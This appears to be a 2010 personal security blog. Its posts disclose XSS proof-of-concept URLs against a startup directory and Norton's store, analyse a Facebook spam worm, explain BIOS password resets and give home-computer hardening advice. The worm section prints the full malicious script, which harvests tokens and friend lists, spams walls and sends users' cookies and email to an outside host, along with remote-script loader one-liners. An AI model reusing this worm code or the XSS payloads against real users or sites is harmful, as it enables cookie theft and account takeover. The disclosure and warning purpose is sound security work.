Monday, December 27, 2010

XSS & CSRF Vulnerabilities on Area Startup Website

Hi Guys, I have found Major XSS and CSRF Vulnerabilities on Area Startup Website while I was just searching for some IT firms details :P and the site is still vulnerable so I have submitted it to xssed.com vulnerability database I hope they will soon fix it :D

Issue Details

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

Crosssite request forgeries (CSRF or sometimes called XSRF) are a simple attack that has huge impacts on Web application security.

CSRF GET-based CSRF (or blind redirects) is simple with XSS-Proxy.The attacker enters the destination into the “fetch document” admin form and the victim will go to the URL, determine that it can’t read the contents, and recover back to where the attacker can perform other actions.

POST-based CSRF is also possible, but requires some JavaScript (via the eval admin form) to perform the attack.The JavaScript could perform a POST-based CSRF if entered in the XSS-Proxy eval admin form (this can be entered as one large command or as multiple eval submissions).

Proof of Concept

Vulnerable Link 1:

http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&sa=Search#842

Screenshot 1:

Vulnerable Link 2:

http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Cscript%3Ealert%28%27This%20Site%20is%20XSS%20Vulnerable%27%29%3C/script%3E&sa=Search#242

Screenshot 2:

Vulnerable Link 3:

http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Ciframe%20src=http://xssed.com%3E&sa=Search#242

Screenshot 3:

Vulnerable Link 4:

http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Cmarquee%3E%3Ch1%3EXSS%28This%20Site%20is%20XSS%20Vulnerable%3C/h1%3E%3C/marquee%3E&sa=Search#243

Screenshot 4:

Vulnerable Link 5:

http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Ca%20href=%27search?searchterm=%3Cb%3EJust%20Fond%20Out%3C/b%3E%27%3EThis%20Site%20is%20XSS%20Vulnerable%3C/a%3E&sa=Search#243

Screenshot 5:

Video:

Friday, December 24, 2010

Symantec Norton Website XSS Vulnerable

Hi Guys, two weeks back I have found that Information Security Gaint Symantec Norton's Website has few XSS vulnerabilities. As off now they have fixed there site it so I am disclosing the Issue :)

Issue Details

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

Proof of Concept

Vulnerable Link 1:

https://buy.norton.com/estore/mf/landingProductFeatures?sfid="><script>alert('xss')</script>Jq23M7YG4pjMHzwGYtlDfhdq1ZYF22vswwCBfgSGGz0k5FrgMHF9!1505726402!1291573284101

or the following code can be used in the search box or input box :

<script>alert('xss')</script>

Screenshot 1:

Vulnerable Link 2:

http://buy.norton.com/estore/mf/landingProductFeatures?sfid="><script>alert('xss')</script>Q72nM7hHJ18nVR9GQVNT3Bz01whgMYMNGSLT1H2nyYDtwwChvs22!1505726402!1291573991721

or the following code can be used in the search box or input box :

<script>alert('xss')</script>

Screenshot 2:

Thursday, December 16, 2010

DOJOCON 2010 Videos

Monday, December 13, 2010

Reverse Engineering Videos

Security Videos Collection

Hello Everybody I want to share to some of my favorite security related videos collection,I am & also giving all those resumable videos direct downlading links so thats everybody can download them easily

, I hope it will be helpful for everybody to learn from them

, full credit goes to the real owners of the videos & to the sites from where I have find these videos.

Security Videos Collection

Malware Analysis & Related Videos

Friday, December 3, 2010

Be Alert From Malicious Scripts & Spam on Facebook

While Analyzing Malicious scripts & codes used by crackers & spammers I found out that crackers and spammers are using different attack vectors & techniques to compromise innocent users pofiles and to spam using automated techniques in which they post a comment in users profile or send them a new application(many times fake) to use for example on facebook or any other social networking profile.

If the user click on that posted Link or uses that New Application(many times fake) mostly the users account got compromised if the site is vulnerable to the malicious code or if its a kinda a Zeroday exploit & sometimes the innocent users profile is bombard with spam messages, comments, posts, ads & fake Application use requests all these spams also automatically got posted or sended to all your friends f the users profile.

So guy if you get a wall post by some of your friend saying some revolving image, new theme thing is out view the link to enjoy it & the message would be like this......

Example 1:

Wowww !! cool Facebook revolving images. MUST SEE http://pageragei.tk/

Example 1:

Super cool Facebook revolving images. MUST SEE http://showmyprofile.tk/

When you open any of these malicous sites, these sites will asks you to copy & paste some JavaScript code like.......

Code :

javascript:(a = (b = document).createElement("script")).src = "//imaginemonkeys.com/majic.js?show", b.body.appendChild(a); void(0)

And when you enter press after copying & pasting that code in your browser that will will redirects you to a malicous java script the link and when you post it in your Facebook account Address bar...

Thats it you start spamming automatically to all your facebook friends wall and the Fire keeps increasing as more and more your friends will click on that malicious code.

the malicious java script code link is: http://imaginemonkeys.com/majic.js

This link has a again a same kind of code but this time the url link in the code is differ......

Code:

javascript:(a = (b = document).createElement("script")).src = "//graphicgiants.com/majic.js?show", b.body.appendChild(a); void(0)

This time the link is: http://graphicgiants.com/majic.js

And when I tried to open it directly in the browser it block me to further analyze it showed me an error message as below mentioned:

Not Found

The requested URL /majic.js was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.graphicgiants.com Port 80

So now I new something is fishy going on there as the site has some kinda authencation mechanisms & also it has mode security install on it to block unauthorised users, so to further analyze it more I opened & used that malicous code in a testing and secure virtual environment with a profile for testing and while doing the whole process i used the sniffer to see the background re-directions to other urls, malicious codes I also crawled the other url of that site.

So I found out that the redirections was to the facebook site whenever a user opens that http://imaginemonkeys.com site directly in the browser and it will first redirect user to the

http://1.88.channel.facebook.com & then to the http://facebook.com official site.

While testing the url inside the imaginemonkeys.com i found out that it has few more links like http://www.imaginemonkeys.com/606/ http://www.imaginemonkeys.com/majic.js etc.

The Script which runs inside the JS means Java Script which is mostly majic.js or the index.php file is

it will show a url like :http://www.imaginemonkeys.com/majic.js OR http://imaginemonkeys.com/index.php

The hidden inside the malicious script is mentioned below.

Code:

//

//

txt = "Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/";

txtee = "Checkout 360 revolve effect on images. MUST SEE http://revolvingimages.info/fb/";

alert("Please wait 2-3 mins while we setup! Do not refresh this window or click any link.");

with(x = new XMLHttpRequest())

open("GET", "/"), onreadystatechange = function () {

if (x.readyState == 4 && x.status == 200) {

comp = (z = x.responseText).match(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];

form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];

dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];

pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];

appid = "150622878317085";

appname = "rip_m_j";

with(xx = new XMLHttpRequest())

open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&filter=all&__a=1&__d=1"),

onreadystatechange = function () { if (xx.readyState == 4 && xx.status == 200) {

m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");

i = 0; llimit=25;

t = setInterval(function () {

if (i >= llimit ) return;

if(i == 0) {

with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&__d=1"),

setRequestHeader("X-Requested-With", null),

setRequestHeader("X-Requested", null),

onreadystatechange = function(){ if(ddddd.readyState == 4 && ddddd.status == 200){ llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); aaac =llm.length; pplp=0; for(pplp=0;pplp([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }

}, send(null);

with(xxcxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("fbpage_id=176607175684946&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");

with(lllllxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("fbpage_id=150650771629477&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");

with(llxlxlxlxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("fbpage_id=109075015830180&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");

} else if (i == llimit - 1) {

with(xxxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"),

setRequestHeader("X-Requested-With", null),

setRequestHeader("X-Requested", null),

onreadystatechange = function(){

if(xxxx.readyState == 4 && xxxx.status == 200){

with(s = document.createElement("script")) src = "http://revolvingimages.info/majic.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }

}, send(null);

}

if(i%2==0) {

with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");

}

else {

with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest"); } i += 1;

}, 2000); }

}, send(null);

}

}, send(null);

Some of the Websites you should not visit if you see below :

http://pageragei.tk/

http://showmyprofile.tk/

http://fbpictures.tk

http://imaginemonkeys.com/fb/

http://fbimages.tk

http://fbookcoolimages.tk/

http://herohide.com/browse.php?

http://www.revolvingimages.info/fb/

http://revolvingimages2.tk/

http://graphicgiants.com/

http://zizz.co.tv/

New domains keep coming by crackers & spammers so be aware never click on unknown links....

HOW TO STOP IT ?

1. To stop it spamming to your wall simply re-generate your mobile email unique address at

http://www.facebook.com/mobile/

2. Change your password also delete all your browers cookies, browsing history & saved passwords.

3. Don't copy/pasting javascript or any ther unknown scripts into your browser again.

4. And mostly importantly never click on unknown links always check your browsers url bar that

it has https or http://www.facebook.com not phising or fake sites like http://www.faacebook or

http://www.faceb00k.com.

5. Use Good Security Suite Softwares like AVG 2011 or Norton 2011 or any other and always update

its virus definitions and program components these security suite has all type of security softwares

in-built like Antivirus, Anti-Spyware, Anti-Spam, Anti-Phising, Firewall & IDS etc.

6. Keep your Operating System always updated and also update all of your application softwares like

the browser itself.

So Be Cautious Guys whenever you see comments like:Great now we have such Applications in Facebook & never use these applications nor accept these applications use requests.

Two Applications which I found out is just popping up is See Who Has Visited Your Profile Profile Privacy v1.2. So please remember that these are FAKE APPLICATION and use such comments on other users wall to click or use them.

I hope my post is helpful for all of you guys :) comments are welcome.

Monday, November 22, 2010

How to Reset Any BIOS Password

Question:

How to clear an any unknown BIOS password ?

Answer:

If you have mistakenly forgot or lost your BIOS password or you receive a password at boot that you do not know, you will need to clear the BIOS password by one of the below methods.

Precaution: When inside the computer please be sure of the potential of ESD.

Try using generic BIOS passwords. A complete listing of these passwords can be found on document CH000451.

There are utilities designed to help bypass BIOS passwords. An example of a great utility to decrypt / bypass BIOS passwords is the PC BIOS Security and Maintenance toolkit, which is available by clicking here.

On the computer motherboard locate the BIOS clear / password jumper or dipswitch and change its position. Once this jumper has been changed, turn on the computer and the password should be cleared. Once cleared, turn the computer off and return the jumper or dipswitch to its original position.

The location of the jumpers or dipswitches may vary; however, here are general locations where these jumpers / dipswitch may be located.

On the edge of the motherboard - Most jumpers are located on the side of the motherboard for easy accessibility, verify by looking at all visible edges of the motherboard.

By the CMOS battery - Some manufactures will place the jumper to clear the CMOS / BIOS password by the actual CMOS battery.

By the processor - Some manufactures will place the jumpers by the processor of the computer. However, note that in some cases these jumpers will be to change the processor and not the password.

Under the keyboard or bottom of laptop - If you are working on a laptop computer the location of the dipswitch (almost never a jumper) can be under the keyboard or on the bottom of the laptop in a compartment such as the memory compartment.

Other visible location - While it is possible that the jumpers / dipswitches may not be in a visible location, most manufactures try to make things easier by placing the jumpers / dipswitches in another visible location.

Additionally, when looking for the jumper / dipswitch the label of that switch can be anything; however, in most cases will be labeled CLEAR - CLEAR CMOS - JCMOS1 - CLR - CLRPWD - PASSWD - PASSWORD - PWD.

On the computer motherboard locate and remove the CMOS battery for at least 10 minutes allowing the computer to lose its information. Note: this will not work on all computers.

If your manufacturer has a bypass password this can be entered and allow you access to the BIOS and/or computer. Because of the security risk of a bypass password, generally only older computers will have this option. In addition, it is likely that this information will only be able to be obtained from the computer, motherboard or BIOS manufacturer.

On the computer motherboard locate the CMOS solder beads and jump the solder beads to clear the password. The identification and location of these solder beads can vary and if not available in computer documentation is generally only obtainable through the computer manufacturer.

If one of the above solutions do not clear the password or you are unable to locate the jumpers or solder beads, it is recommended you contact the computer manufacturer or motherboard manufacturer for the steps on clearing the computer password.

Wednesday, November 11, 2009

Audit Policy Settings Basic to In-depth Home Computer Security Guide Page 24

Search Engine Optimization and SEO Tools

Audit Policy Settings

User can set the Audit Policy Setting to determine the security events to report the user or system activity. For example, the user can choose to audit failed logon attempts, which might indicate that someone is trying to log on with an invalid password (perhaps using a program to automate the attack). Or user might want to monitor the use of a particular sensitive file. The user can also choose to monitor changes to user accounts and passwords, changes to security policies, and use of privileges that might reveal that someone is trying to "administer" user’s computer—perhaps not with user’s best interests in mind.

Unlike the other logs that appear in Event Viewer, the Security log is disabled by default in Windows XP Professional and Windows 2000. No events are written to the Security log until the user enable auditing, which is done via Local Security Settings. (In Windows XP Home Edition, security auditing is enabled for certain events. Because Home Edition doesn't include Local Security Settings, user cannot change which events are audited unless he use a tool like Auditpol.exe, which is included in the Windows 2000 Resource Kit.) Even if the user sets up auditing for files, folders, or printers, the events he specified aren't recorded unless he also enables auditing by setting a high-level audit policy in

Local Security Settings.

To edit the Audit Policy Setting Start menu\Settings\Control Panel\Administrative Tools\Local Security Settings\local Policies\Audit Policy and check the boxes accordingly

The following table gives the Audit policy available in Windows Operating System with their respective descriptions.

Table-1: Audit Policies for Security Events

Policy Description

Audit account Account logon events occur when a user attempts to log on or log off

logon events across the network, authenticating to a local user account.

Audit account Account management events occur when a user account or security

management group is created, changed, or deleted; when a user account is

renamed, enabled, or disabled; or when a password is set or changed.

Audit directory Directory service access events occur when a user attempts to access

service access an Active Directory object. (If the computer is not part of a Windows

domain, these events won't occur.)

Audit object Logon events occur when a user attempts to log on or log off a

events workstation interactively.

Audit object Object access events occur when a user attempts to access a file,

access folder, printer, registry key, or other object that is set for auditing.

Audit policy Policy change events occur when a change is made to user rights

change assignment policies, audit policies, trust policies, or password

policies.

Audit privilege Privilege use events occur when a user exercises a user right (other

use Than logon, logoff, and network access rights, which trigger other

types of

Audit process Process tracking includes events such as program activation, handle

tracking duplication, indirect object access, and process exit. Although this

policy generates a large number of events to wade through, it can

provide useful information, such as which program a user used to

access an object.

Audit system System events occur when a user restarts or shuts down the computer

events or when an event affects the system security or the Security log.

Local Security Settings has some additional policies that affect auditing, but they're not in the Audit Policy folder. Instead, look to the Security Settings\Local Policies\ Security Options folder for these policies:

• Audit: Audit the user of Backup and Restore privilege. Enable this policy if the user wants to know when someone uses a backup program to back up or restore files. To make this policy effective, user must also enable Audit Privilege Use in the Audit Policy folder.

• Audit: Shut down system immediately if unable to log security audits.

• Audit: Audit the access of global system objects. This policy affects auditing of obscure objects (mutexes and semaphores, for example) that aren't used in most home and small business networks; users can safely ignore it.

The user should only enable the audit policies which he requires to monitor. As it is a time-consuming process and can waste a lot of resources. When the auditing is enabled, the system must write an event record to the Security log for each audit check the system performs. This activity can degrade the computer’s performance. There is absolutely no need to enable them all, it’s purely on the requirement of the user, like Audit Directory Service Access is not required for the home user who is not connected to any Windows Active Directory network.

In addition, indiscriminate auditing adds to log many events that might be of little value to the user, thereby making the real security issues more difficult to find. And because the Security log has a fixed size, filling it with unimportant events could displace other, more significant events.

Here are some suggestions for what user should consider auditing:

• Audit failed logon attempts, which might indicate that someone is trying to log on with various invalid passwords.

• If the user is concerned about someone using a stolen password to log on, audit successful logon events.

• To detect use of sensitive files (such as a payroll data file, for example) by unauthorized users, audit successful read and write access as well as failed attempts to use the file by suspected users or groups.

• If the user use his computer as a Web server, he will want to know whether an attacker has defaced his Web pages. By auditing write access to the files that make up the Web pages, user will know whether his site has been vandalized.

• To detect virus activity, audit successful write access to program files (files with .exe, .com, and .dll file name extensions).

• If the user is concerned that someone is misusing administrative privileges, audit successful incidents of privilege use, account management, policy changes, and system events.

Event Viewer

A component a user can use to view and manage event logs, gather information about hardware and software problems, and monitor security events. It maintains logs of three kinds: application, system, and security.

Checkout for the security logs in event viewer regularly.

To open Event Viewer follow steps given below:

Start menu\Setting\Control Panel\Administrative Tools\ Event Viewer

Thats the End of Tutorial in Future I will update this tutorial.

Various Techniques Used by Hackers to Retrieve Passwords Basic to In-depth Home Computer Security Guide Page 23

Various Techniques Used by Hackers to Retrieve Passwords

·One way of stealing the password is standing behind an individual and over looks their password while they are typing it or search for the papers where they have written the password.

·Another way of stealing the password is through guesses. Hackers try all the possible combinations with the help of personal information of an individual.

·When there are large number of combinations of passwords, the hackers uses fast processors and some software tools to crack the password. This method of cracking password is known as “Brute force attack”.

·Hackers also try all the possible words in an dictionary to crack the password with the help of some software tools. This is called a “dictionary attack”.

Sample password:

IJ!5iS@g0odP4s5wD ---->This is a good password

administrator123 --->bad password

Password Policy

It’s a general practice of users to keep the same password for life long; rather users should change their passwords regularly.

Password should be complex and change regularly. Password policy setting controls the complexity of the password. To edit the password policy setting, go to Start menu\Settings\Control Panel\Administrative Tools\Local Security Setting\Account Policy\Password Policy\ set each and every option

• Enforce Password History

• Maximum Password Age

• Minimum Password Age

• Minimum Password Length

• Password Must Meet Complexity Requirement

Whenever the user is required to use a password, he should use a strong password that conforms to the following Countermeasures:

• At least seven characters in length (the longer the better)

• Includes upper and lower case letters, numerals, symbols

• Has at least one symbol character in the second through sixth position

• Has at least four different characters in given password (no repeats)

• Looks like a sequence of random letters and numbers

• Don’t use any part of logon name for the password

• Don’t use any actual word or name in ANY language

• Don’t use numbers in place of similar letters

• Don’t reuse any portion of old password

• Don’t use consecutive letters or numbers like "abcdefg" or "234567"

• Don’t use adjacent keys on the keyboard like "qwerty"

A good way to create a strong password is by using the first letters of a phase that user can easily remember.

Login settings

Windows NT, 2000 and XP come with many built in users and groups. These include the Administrator, Backup Operator, Guest, Power User and many more. The purpose of these groups is to enhance the abilities of a user without having to make that user an Administrator. However, due to the powers granted to these groups any user that is a member of one can become an Administrator. All unnecessary users must be disabled.

To disable unwanted accounts follow the steps as follows. Go to Start menu\Settings\Control Panel\Administrative Tools\Computers Management\Local Users and Groups\Users. Double click the account user want to disable and Check the box see Figure-15.

Figure-16: Account is disabled

Continued...................

Defensive Measures at Data Layer Basic to In-depth Home Computer Security Guide Page 22

Defensive Measures at Data Layer

This is the fourth and core layer of the defense in depth model. The defensive measures that have to be taken at this layer are:

§User must backup his important files

§Use encryption to ensure confidentiality of sensitive data

§File Checksum

§Password Policy

§Login Settings

§Audit Policy Settings

§Event Viewer

User must backup his Important Files

Taking backups of important files is one of the important safety measures to be taken. It’s like keeping a spare tyre in the car while driving. Imagine the situation when one of the car’s tyre punctures and when driver is about to change that, he come to know that he does not have a spare tyre with him? Or what happens if the computer system malfunctions or is destroyed by a successful attacker?

Backing up data is a task user should perform regardless of whether his system is secured or not. As far as security is concerned, this is the last line of defense. If someone gains access to the system and delete files, then user will need to restore them from backup.

Confused!!!- Which file to save and which not. Here is a help to discriminate between the two. Generally files are divided in two broad categories:

• Files which can be replaced: like basic operating system or application files.

• Files which can’t be replaced: like family pictures, letters, invoices and account records etc.

Although it is the best practice to backup the whole system, but the constraint is of space available on the backup media. User can backup data to an external or removable hard drive, a personal tape drive, Zip or Jazz drive, CDburner or a DVD-burner or bare minimum on to floppy. If user has a CD-writer (which may take more than one CD to take full backup) or DVD-writer he can conveniently take the full backup of his system. But if user does not have these two then he has to decide formerly about the files he wants to take backup and according to the space requirement he can select his backup media.

Every Operating System provides the feature to take backups on different media. Apart from that different applications are also available which can take the backups like the application which come with CD- writer or DVD-writer.

There is an in-built program that comes with Windows Operating System which is called as “Backup”. It is located at Start>Programs>Accessories>System Tools, and is quite easy to operate. User just has to select the files for backup and the destination where he want to store.

How and where should user store his backup media after he backup data to them? Well, user needs to store them in a safe place—remember that they contain files that are virtually irreplaceable if lost or damaged. If user does not have a secure storage area, it must not let this to prevent him from doing regular backups: any backup is better that no backup!

The definition of regularity depends on the comfort level of the user, i.e. how much work is one prepared to lose? A daily backup would be ideal but a weekly backup might be more viable.

Use encryption to ensure confidentiality of sensitive data

With the newer versions of Windows, i.e. Windows 2000 and XP, the user can use the Encrypting File System (EFS) to encrypt important data files. By using such encryption, an intruder who gets through the entire defense in depth layers and tries to access encrypted files or folders will be prevented from doing so. The intruder will receive an access denied message if he tries to open, copy, move, or rename an encrypted file or folder, unless the intruder has determined the UID and password of either the system administrator or the user who created the encrypted file.

Once a file or folder is encrypted, the user can work with the encrypted file or folder just as he would with any other file and folder since encryption is transparent to the user that encrypted the file. This means that the user does not have to decrypt the encrypted file before using it.

A file or a folder can be encrypted, subject to the following constraints, by using Explorer selecting the file/folder and clicking on the “Encrypt contents to secure data” attribute on the advanced features of the properties page:

• Can only encrypt files and folders on NTFS file system volumes.

• Compressed files or folders cannot be encrypted.

• System files cannot be encrypted.

If the user should ever lose their file encryption certificate and associated private key (through disk failure or any other reason), then data recovery is available through the person who is the designated recovery agent.

Of course if the use of EFS is not an option, then a knowledgeable user could use PGP for this sort of encryption. However, using PGP would not be transparent like using EFS. PGP Freeware is available for non-commercial use.

Apart form these; if the user is not using EFS or PGP, then he should use at least NTFS (NT File System), which gives file level user security. Windows 9x does not support NTFS file system, a user should have at least Windows NT or above to use NTFS.

File checksum

File Checksum is a utility that computes MD5 or SHA1 cryptographic hashes for files. The File Checksum utility can generate MD5 or SHA-1 hash values for files to compare the values against a known good value. It can compare hash values to make sure that the files have not been changed. It can also compute hashes of all critical files and save the values in an XML file database. It could be used to check the changes or compromise of the computer against the XML database to determine which files have been modified.

Users are advised to calculate checksum of all the system files and compare them regularly against the threat of Trojans or backdoors.

Password Policies

Importance of a password

·Password represents the identity of an individual for a system.

·This helps individuals protect personal information from being viewed by unauthorized users. Hence it is important to secure passwords.

·Passwords acts like a barrier between the user and his personal information.

BASIC THINGS TO REMEMBER WHILE SETTING A PASSWORD

·Use at least 8 characters or more to create a password. More number of characters we use, more secure is our password.

·Use various combinations of characters while creating a password. For example, create a password consisting of a combination of lower case, uppercase, numbers and special characters etc.

·Avoid using the words from dictionary. They can be cracked easily.

·Create a password such that it can be remembered. This avoids the need to write passwords somewhere, which is not advisable.

·A password must be difficult to guess.

Countermeasures for Choosing a Good Password and Safeguarding Passwords

·Do not use a password that represents you personal information like nicknames, phone numbers, date of birth etc.

· Change the password once in a month or when you suspect someone knows the password.

·Do not use a password that was used earlier.

·Be careful while entering password when someone is sitting beside you.

·Never write a password on paper to store it. The brain is the best place to store it.

· Do not reveal your password to anyone, not even to the system administrator.

· Store the passwords on computer with the help of an encryption utility.

·Do not use the name of things located around you as passwords for your account.

Continued.....................

Security Zones Basic to In-depth Home Computer Security Guide Page 21

Security Zones

IE uses a capabilities/trust model called Zone Security. In this model, Web sites are permitted to perform certain actions based on the following zones.

• Restricted sites Zone-This zone contains web sites that could potentially damage user’s data.

• Trusted sites zone-This zone contains web sites that user can trust not to damage his computer or data.

• Local Intranet Zone- This zone contains all web sites that are on organization’s intranet.

• Internet Zone- This zone contains all web sites that user haven’t placed in other zones.

Figure-12: Security zones in Internet Explorer

Each zone has an assigned security level (High, Medium, Medium-Low, or Low). Users can modify the security level for each zone, but IE will warn them if they attempt to assign a zone, a security level lower than the recommended minimum level.

Disable ActiveX and Java Scripts

Malicious web scripts can get to a web browser when a web developer sends such damaging code as part of the web server’s response. This malicious code is then executed on the host running the browser.

Unfortunately the problem is by disabling these features; the user may find it frustrating that certain sites can no longer be effectively browsed. If the user cannot live without being able to run these scripts, then an alternative is to use a commercial anti-virus scanner that affords some level of protection against malicious scripts.

Choose the following options for safety:

Open Internet Explorer.

On the menu select Tools à Internet Options.

• Click on the Security tab.

• With the Internet zone highlighted, click the Custom Level button.

• Make the following modifications to the Internet zone:

• Under ActiveX controls and plug-ins, set Script ActiveX controls marked safe for scripting to Disable

• Under Scripting, set Active scripting to Disable (This will disable all scripting, including ActiveX. If this impacts required functionality, change the setting to Prompt)

• Under Scripting, set Scripting of Java applets to Disable

By default Trusted sites zone is assigned low security level, since this zone is intended for highly trusted sites, such as the sites of trusted business partners. User can also customize the settings by clicking on Custom level tab.

To add sites to this zone

• Click on Trusted sites icon

• Click on sites tab to add the trusted web site name

• Select Require server verification (HTTPS for all sites in this zone - This ensures that connections to the site are completely secure

• By default, the Restricted sites zone is assigned High security level. Assign sites to this zone as described earlier.

• Click on OK to return to the Internet Options box, and then click OK.

Other Security Settings in IE

IE contains many other security-related settings. Guidance on implementing a few of particular interest is as follows:

• Open Internet Explorer

• On the menu select Tools Internet Options

• Click on the Advanced tab

• Under Security, check the box for Check for server certificate revocation. This causes IE to verify that a Web site’s digital certificate has not been revoked before accepting it as legitimate and current

• Under Security, check the box for Empty Temporary Internet Files folder when browser is closed. This causes IE to delete temporary files after the browser session is finished; these files could inadvertently contain sensitive information.

Figure-13: Other Security Settings for IE

• Click on the Privacy tab, and then click the Advanced button

• Check the Override automatic cookie handling box. This allows different settings to be made for handling first-party and third-party cookies

• Change the Third-party Cookies setting from Accept to Prompt.

This setting causes IE to prompt the user to accept each third-party cookie that is presented to the system.

For more information on Internet Explorer look at the home page of IE at

http://www.microsoft.com/windows/ie/default.mspx

Secure Site Identification

When buying online, the user must be sure doing business on secure Web sites. Unscrupulous "hackers" can exploit insecure sites to steal user’s personal and important information such as credit card number. This information could be used to steal user’s identity.

Most e-commerce Web sites secure user’s personal information by encrypting or scrambling the data. Netscape and Internet Explorer users can check Web site security by following these instructions:

1. Look for the Lock symbol

Check the status bar at the bottom of the Web browser window for an unbroken lock symbol. This means user’s personal information is scrambled, and no one can read it but the e-business he has contacted.

2. Look for "https" in the Web Site's Address

Secure sites will change their beginning from "http" to “https” if the information is about to pass through a secure channel. The "s" stands for "secure" and indicates that information will travel the Internet in encrypted form.

Since user’s data is encrypted or scrambled, it can't be read during transmission. For example in www.hotmail.com when user enters the login and password information, the address bar indicates a change from “http” to “https” and also shows the following message before forwarding the information See Figure-13.

Figure -14: Message for secure connection

This warning message is generally ignored by the user or they just select it not to show in future, which is a bad practice. Whenever a security confirmation is made, user should verify the server’s digital certificate.

Check the Certificate

Double-click on the lock symbol to view the security certificate. Make sure the certificate is "Issued to" the Web site and the "Valid from" dates are current. User can also see the certificate from File à Properties and then choose certificates.

Figure-15: Checking the validity of a certificate

The certificate should be checked for the issuer, to whom it has been issued and validity period of the issued certificate (as shown in the figure-14 above).

Continued..................